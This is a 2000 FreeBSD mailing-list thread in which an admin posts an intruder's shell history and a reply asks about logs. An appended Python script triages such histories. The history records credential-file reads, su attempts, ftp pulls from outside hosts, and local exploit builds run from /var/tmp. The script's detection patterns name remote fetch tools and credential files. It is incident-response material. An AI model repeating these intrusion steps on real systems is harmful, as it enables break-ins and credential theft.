Date: Mon, 18 Dec 2000 15:31:02 -0500 (EST)
From: Alexander V P <alex@big-blue.net>
To: "Gerald T. Freymann" <freymann@eagle.ca>
Cc: Questions <questions@FreeBSD.ORG>
Subject: Re: Hacker history file - OUCH
Message-ID: <Pine.BSF.4.05.10012181523480.23598-100000@borg.starbase.net>
In-Reply-To: <NEBBIPHLEDGOAFACJGDDAEBPDHAA.freymann@eagle.ca>
hi,

do you keep/have logs about what ftp transfers he did?
did you send mail to root@he.net, or the .mx domain?
any idea how he broke in? what freebsd are you using?

if I were in your place, I'd unplug the box and try to find out more about this.
don't do like most of the sysadmins that just wipe the box.

alex

On Mon, 18 Dec 2000, Gerald T. Freymann wrote:

> Seems we have an intruder on one of our boxes... the .history file from the
> troubled account follows:
>
> cd bnc
> ls
> ./bash
> who
> cd /etc
> more passwd
> ps -l
> ls -l
> more pwd.db
> more hosts
> pico adduser.conf.bak
> pico group
> su user
> pico group.bak
> pico ftpuser
> O
> pico ftpusers
> su toor
> su operator
> id
> pico spwd.db
> su wheel
> pico passwd
> cd /var/tmp
> ls -a
> cd ...
> ls -a
> cd ..
> ls -l
> ls -al
> cd ...
> ftp copper.he.net
> chmod u+x xcon
> ./xcon
> id
> rm *
> ls
> who
> cd /var/tmp
> ls -a
> ls -al
> cd ...
> ls -a
> ftp cih.edu.mx
> ls
> cc bsd1 bsd-cron.c
> cc -o bsd1 bsd-cron.c
> ./bsd1
> id
> cc -o bsd2 bsd2.c
> ./bsd2
> id
> ls
> ftp cih.edu.mx
> ./bsd sh
> ./bsd.sh
> chmod u+x bsd.sh
> ./bsd.sh
> /tmp/sh
> id
> ls
> cc -o bsdsmail bsdsmail.c
> ./bsdsmail
> ls -a
> pico hack
> ls
> pico user.inf
> ls
> id
> rm *
> exit
>
> Anybody recognize what the intruder has set up?
>
> -Gerry
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-questions" in the body of the message
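Added example, not part of this thread or of anyone's reply: a small Python triage script that runs over a shell history file like the one Gerry quoted and groups the commands by what an incident responder should collect before the box is wiped (the questions Alex asks about ftp logs and contacted hosts included). The HISTORY sample is constructed from a subset of the quoted commands; the rule set and the ACTIONS table are my own assumptions about sensible first steps, not anything from the list or from FreeBSD itself.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the .history quoted in the thread, one command per line.
HISTORY = """\
cd bnc
./bash
more passwd
more pwd.db
pico group
su toor
su operator
su wheel
cd /var/tmp
cd ...
ftp copper.he.net
chmod u+x xcon
./xcon
id
rm *
ftp cih.edu.mx
cc -o bsd1 bsd-cron.c
./bsd1
/tmp/sh
pico user.inf
exit
"""

# Hypothetical rule set (an assumption, not a standard): category -> pattern.
RULES = [
    ("credential_files", re.compile(r"^(more|cat|less|pico|vi)\s+(/etc/)?(passwd|pwd\.db|spwd\.db|master\.passwd|group|ftpusers?)\b")),
    ("privilege_probe",  re.compile(r"^su\b")),
    ("staging_dir",      re.compile(r"^cd\s+/(var/)?tmp\b")),
    ("hidden_dir",       re.compile(r"^cd\s+\.{3,}")),
    ("remote_fetch",     re.compile(r"^(ftp|fetch|wget|curl|tftp)\s+(\S+)")),
    ("local_build",      re.compile(r"^cc\b.*\.c\b")),
    ("run_untrusted",    re.compile(r"^(\./\S+|/tmp/\S+)")),
    ("cleanup",          re.compile(r"^rm\s+")),
]
RULES_BY_NAME = dict(RULES)

# Defender follow-up per category (assumed checklist): what to preserve or check.
ACTIONS = {
    "credential_files": "treat the password database as read; rotate every account's password",
    "privilege_probe":  "compare the su attempts against the auth log to see which succeeded",
    "staging_dir":      "copy /var/tmp and /tmp in full, timestamps included, before touching anything",
    "hidden_dir":       "look for dot-named directories such as '...' under the staging directories",
    "remote_fetch":     "pull the ftp transfer logs for these hosts and notify their admins",
    "local_build":      "preserve the .c sources and the compiled binaries for analysis",
    "run_untrusted":    "check for processes, cron entries and listening sockets started from these paths",
    "cleanup":          "expect deleted files; image the disk rather than relying on ls",
}


def classify(command):
    """Return the categories a single history line falls into (possibly empty)."""
    command = command.strip()
    return [name for name, rx in RULES if rx.search(command)]


def triage(history_text):
    """Map category -> [(line_no, command), ...] for every flagged history line."""
    findings = defaultdict(list)
    for n, raw in enumerate(history_text.splitlines(), 1):
        for name in classify(raw):
            findings[name].append((n, raw.strip()))
    return dict(findings)


def remote_hosts(history_text):
    """Hosts contacted by fetch-style commands, in order of first use."""
    hosts = []
    for raw in history_text.splitlines():
        m = RULES_BY_NAME["remote_fetch"].search(raw.strip())
        if m and m.group(2) not in hosts:
            hosts.append(m.group(2))
    return hosts


def next_steps(findings):
    """(category, action) pairs for the categories actually seen, in rule order."""
    return [(name, ACTIONS[name]) for name, _ in RULES if name in findings]


if __name__ == "__main__":
    found = triage(HISTORY)
    for name, hits in found.items():
        print(f"[{name}] {len(hits)} line(s): " + "; ".join(c for _, c in hits))
    print("remote hosts:", ", ".join(remote_hosts(HISTORY)))
    for name, action in next_steps(found):
        print(f"- {name}: {action}")
```

The point of the categories is ordering the evidence collection: the hosts list answers the "did you mail root@..." question, the staging and build hits say which directories to copy off before anything is cleaned, and the cleanup hits are the reason to image the disk rather than trust a listing.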